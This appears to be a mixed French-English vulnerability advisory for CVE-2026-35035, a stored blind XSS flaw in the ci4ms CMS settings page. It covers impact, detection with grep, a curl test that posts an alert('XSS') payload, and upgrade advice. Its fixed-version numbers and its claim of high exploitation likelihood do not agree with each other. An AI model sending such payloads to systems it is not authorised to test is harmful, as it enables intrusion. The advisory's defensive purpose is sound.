Plateforme
php
Composant
ci4-cms-erp/ci4ms
Corrigé dans
0.31.3
0.31.2.0
CVE-2026-35035 describes a critical Stored DOM Blind Cross-Site Scripting (XSS) vulnerability affecting versions of ci4-cms-erp/ci4ms up to 0.31.1.0. This vulnerability allows attackers to achieve full account takeover and privilege escalation by injecting malicious scripts into the System Settings Company Information section of public-facing landing pages. A patch is available in version 0.31.2.0, and users are strongly advised to upgrade immediately.
The impact of CVE-2026-35035 is severe due to the potential for full account takeover and privilege escalation. An attacker can inject arbitrary JavaScript code into the System Settings Company Information section, which is accessible via public-facing landing pages. This allows them to steal user credentials, modify data, perform actions on behalf of the compromised user, and potentially gain control of the entire application. The blind nature of the XSS makes it harder to detect, as the payload execution might not be immediately visible to the user, increasing the risk of persistent compromise. This vulnerability could lead to significant data breaches, financial losses, and reputational damage.
CVE-2026-35035 was publicly disclosed on 2026-04-06. The CVSS score of 9.1 (CRITICAL) indicates a high probability of exploitation. No public proof-of-concept (POC) code has been released at the time of writing, but the ease of exploitation inherent in XSS vulnerabilities suggests that a POC is likely to emerge. It is not currently listed on the CISA KEV catalog.
Organizations using ci4-cms-erp/ci4ms in production environments, particularly those with public-facing landing pages and inadequate input validation, are at significant risk. Shared hosting environments where multiple users share the same instance of ci4-cms-erp/ci4ms are also particularly vulnerable, as a compromise of one user account could potentially lead to the compromise of the entire system.
• php: Examine application logs for suspicious JavaScript code being stored in the System Settings Company Information section. Use grep to search for <script> tags or other XSS payload indicators within the database entries associated with this section.
grep -r '<script' /path/to/database/files• generic web: Monitor access logs for requests containing unusual or obfuscated JavaScript code in the Company Information field. Use curl to test the affected endpoint with a simple XSS payload and observe the response.
curl -X POST -d "Company Information=<script>alert('XSS')</script>" https://your-ci4ms-instance/system-settings/company-informationdisclosure
Statut de l'Exploit
EPSS
0.10% (percentile 26%)
CISA SSVC
Vecteur CVSS
The primary mitigation for CVE-2026-35035 is to upgrade to version 0.31.2.0 or later, which contains the fix. If upgrading immediately is not possible, consider implementing temporary workarounds. Input validation and sanitization on the System Settings Company Information section should be implemented to prevent the injection of malicious scripts. Web Application Firewalls (WAFs) configured to detect and block XSS payloads can provide an additional layer of defense. Regularly review and update security policies and procedures to ensure they address XSS vulnerabilities.
Mettez à jour vers la version 0.31.2 ou supérieure pour corriger la vulnérabilité. Cette version implémente une sanitisation appropriée de l'entrée utilisateur dans les paramètres système, évitant le stockage et le rendu non sécurisés des données sur les pages publiques.
Analyses de vulnérabilités et alertes critiques directement dans votre boîte mail.
CVE-2026-35035 is a critical Stored DOM Blind XSS vulnerability in ci4-cms-erp/ci4ms versions up to 0.31.1.0, allowing attackers to achieve full account takeover.
You are affected if you are using ci4-cms-erp/ci4ms version 0.31.1.0 or earlier and have public-facing landing pages.
Upgrade to version 0.31.2.0 or later. Implement input validation and sanitization as a temporary workaround.
While no public exploits are currently known, the high CVSS score and ease of exploitation suggest active exploitation is possible.
Refer to the official ci4-cms-erp project repository or website for the latest security advisories and updates.
Téléverse ton fichier de dépendances et découvre instantanément si cette CVE et d'autres te touchent.